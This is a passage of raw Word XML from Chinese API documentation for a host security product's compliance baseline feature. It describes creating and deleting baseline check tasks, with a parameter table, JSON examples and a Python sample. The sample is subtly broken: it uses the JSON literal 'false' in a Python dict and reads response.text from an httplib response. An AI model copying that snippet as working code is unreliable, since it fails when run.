    <w:p w14:paraId="3040963D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>没有权限，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D06D9D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>状态参数不合法，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F09F681" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="345" w:name="_Toc115166245"/>
      <w:bookmarkStart w:id="346" w:name="合规基线"/>
      <w:bookmarkEnd w:id="262"/>
      <w:bookmarkEnd w:id="326"/>
      <w:bookmarkEnd w:id="344"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>合</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>规</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>基线</w:t>
      </w:r>
      <w:bookmarkEnd w:id="345"/>
    </w:p>
    <w:p w14:paraId="2C427DDE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>基线检查提供基线检查项在所有主机中的检查结果，即可查询某一个检查项，也可查询某个主机IP的结果，请根据需要选择。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE380AC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="347" w:name="_Toc115166246"/>
      <w:bookmarkStart w:id="348" w:name="新建任务"/>
      <w:r>
        <w:t>新建任务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="347"/>
    </w:p>
    <w:p w14:paraId="6BCC03D9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBC92F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/baseline/job/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395F06BE"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423"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="4777"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="5699146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D9267EA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44A93B06" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B4A25CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5CD50324" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49B0483F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AD085C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CA83A64" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务名，必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0BF01397" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72E65CCF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>kind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A835E26" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CBF8F79" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>必填，范围类型 0-主机 1-业务组 2-全部</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="04E009E8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="142C3A6F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FCA7F19" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="167AECED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>kind=0时必填，所选主机列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="714502D1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21E8B98A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="782295B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61D631E5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>kind=1时必填，所选业务组列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3576DE18" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F8A09F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ruleId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DACC38F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17D730C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>必填，基线规则id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="07EB5EEE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C33011B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cronEnabled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BBE401A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CADF061" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>必填，是否定时任务 true-定时任务 false-普通任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="270DC514" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BA591F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49DCE7AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AB0ADF1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cronEnabled</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=true必填，</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>任务表达式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4714A39F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="564E5187" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="159A89E7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64A91EEF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7DD5DAB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10344AB1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "name": "test_001",  //必填，任务名</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "kind": 1,  //必填，范围类型 0-主机 1-业务组 2-全部</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "values": ["407c1dd87b1d7771"],  //kind=0时必填，所选主机列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">       "groups": [1, 3, 446],  //kind=1时必填，所选业务组列表</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ruleId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "1b8094cf2cacf0e42acf",  //必填，基线规则id</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cronEnabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false,  //必填，是否定时任务 true-定时任务 false-普通任务</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "0 17 * * *",  //</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cronEnabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=true必填，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>任务表达式</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">       "description": "xxx"  //任务描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4122225F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558D6795" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>status":"success</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",//任务创建状态</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "id": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xxxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" //任务</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>specId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCBAD80"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788"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="103E7C4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CCBD055" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="520415A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01BED002" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6B3E296E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48324EF7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D0C39CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6911CEFA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务创建状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="14C56838" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AC84E48" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="016FFA99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FED7C46" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>任务</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>specId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="743BE2AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3873880C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>#! /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bin/env python</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httplib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>host = "127.0.0.1"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>port = 80</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t># 创建基线任务示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>create_baseline_spec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httplib.HTTPConnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/baseline/job/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    body = {"name": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>test_spec","kind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,"values":[],"groups": [],"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ruleId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "1b8094cf2cacf0e42acf","cronEnabled": false,"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "","description": "123"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    payload = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(body)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    headers = {'Content-Type': "application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("POST", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data=payload, headers=headers)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.getresponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>response.text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43370A9A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="349" w:name="_Toc115166247"/>
      <w:bookmarkStart w:id="350" w:name="删除任务"/>
      <w:bookmarkEnd w:id="348"/>
      <w:r>
        <w:t>删除任务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="349"/>
    </w:p>
    <w:p w14:paraId="319E9268" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B637F2B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>DELETE /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/baseline/job/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，win}/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>specId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231250DE"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836"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1279"/>
      </w:tblGrid>
